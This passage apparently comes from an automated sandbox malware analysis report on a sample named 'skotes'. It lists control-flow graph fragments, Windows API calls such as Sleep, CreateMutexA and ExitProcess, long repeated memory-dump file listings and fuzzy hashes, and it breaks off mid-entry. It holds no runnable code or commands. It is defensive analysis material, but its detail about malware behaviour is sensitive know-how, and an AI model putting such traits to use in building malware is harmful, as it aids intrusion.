GetPEB 10081->10083 10082->10062 10083->10082 10371 ea2b90 10372 ea2bce 10371->10372 10373 ebb7fb TpReleaseWork 10372->10373 10374 ea2bdb shared_ptr std::future_error::future_error 10373->10374 10447 ebd111 10449 ebd122 10447->10449 10448 ebd12a 10449->10448 10451 ebd199 10449->10451 10452 ebd1a7 SleepConditionVariableCS 10451->10452 10454 ebd1c0 10451->10454 10452->10454 10454->10449 10455 ea2b10 10456 ea2b1a 10455->10456 10457 ea2b1c 10455->10457 10458 ebc26a 4 API calls 10457->10458 10459 ea2b22 10458->10459 9686 eaa856 9688 eaa870 9686->9688 9689 eaa892 shared_ptr 9686->9689 9687 eaa953 Sleep CreateMutexA 9690 eaa98e 9687->9690 9688->9687 9688->9689

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 342 ed652b-ed6538 call eda302 345 ed655a-ed656c call ed656d ExitProcess 342->345 346 ed653a-ed6548 GetPEB 342->346 346->345 347 ed654a-ed6559 346->347 347->345
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32(?,?,00ED652A,?,?,?,?,?,00ED7661), ref: 00ED6567
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                                                                                              • Opcode ID: de895738e9d9a82e6f038d4be9127467e76efb2c2636381d2cbfd41247a45bfc
                                                                                                                                                                                                                                                              • Instruction ID: e3f0538bed82534e0b7b504b474739bc01f49ae1b74e7b019b59e6d48894c199
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de895738e9d9a82e6f038d4be9127467e76efb2c2636381d2cbfd41247a45bfc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AE08C3004110CAECF257F18D809D4C3BAAEB91B49F442C21FC1866722CB26EEC2C680

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 7c77372ca0c819fdf5714e9ab68aec712287e1923719bb91e7c474ccecd1c933
                                                                                                                                                                                                                                                              • Instruction ID: 1da5fe12e2a244298e68309a518d6353f1b5fd6da8980bc4d5e5f32f15580c65
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c77372ca0c819fdf5714e9ab68aec712287e1923719bb91e7c474ccecd1c933
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0312B716042048BEB08AB68DC857AEF7A6EBCB314F249618E014FF3D6C775A981C751

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 22 ea9f44-ea9f64 26 ea9f92-ea9fae 22->26 27 ea9f66-ea9f72 22->27 30 ea9fdc-ea9ffb 26->30 31 ea9fb0-ea9fbc 26->31 28 ea9f88-ea9f8f call ebd663 27->28 29 ea9f74-ea9f82 27->29 28->26 29->28 32 eaa92b 29->32 36 eaa029-eaa916 call eb80c0 30->36 37 ea9ffd-eaa009 30->37 34 ea9fbe-ea9fcc 31->34 35 ea9fd2-ea9fd9 call ebd663 31->35 39 eaa953-eaa994 Sleep CreateMutexA 32->39 40 eaa92b call ed6c6a 32->40 34->32 34->35 35->30 43 eaa00b-eaa019 37->43 44 eaa01f-eaa026 call ebd663 37->44 52 eaa996-eaa998 39->52 53 eaa9a7-eaa9a8 39->53 40->39 43->32 43->44 44->36 52->53 54 eaa99a-eaa9a5 52->54 54->53
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747368388.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747399755.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747494405.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747526417.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747556586.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747584320.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747611318.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747782150.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747808925.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747844806.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747872445.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747955076.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1747983085.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748012236.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748041127.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748072207.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748100281.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748129827.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748162195.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748203595.00000000010C6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748235102.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748263519.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748291851.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748323826.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748353642.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748381998.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748410518.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748438094.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748469298.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748496878.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748524293.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748551601.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748579015.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748601479.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748620342.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748638394.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748656500.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748673938.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748693881.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748715245.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748733390.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748752057.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748770761.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748793044.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748811807.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748829820.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748847354.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748872575.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748891382.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748947527.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1748997514.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749045528.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749088386.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749122409.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749144178.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1749163814.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: cbff7010e4aff98552d0a5026c42e7de246ec93b9eeb13d04804691d6f36d1a0
